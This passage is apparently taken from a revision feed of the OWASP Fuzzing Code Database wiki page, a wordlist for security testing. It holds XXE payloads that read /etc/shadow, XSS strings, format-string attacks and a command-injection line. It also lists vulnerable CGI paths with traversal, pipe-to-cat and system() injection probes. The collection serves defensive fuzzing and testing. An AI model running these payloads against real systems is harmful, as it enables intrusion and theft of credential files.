&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80085</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80085"/>
				<updated>2010-03-17T21:17:10Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
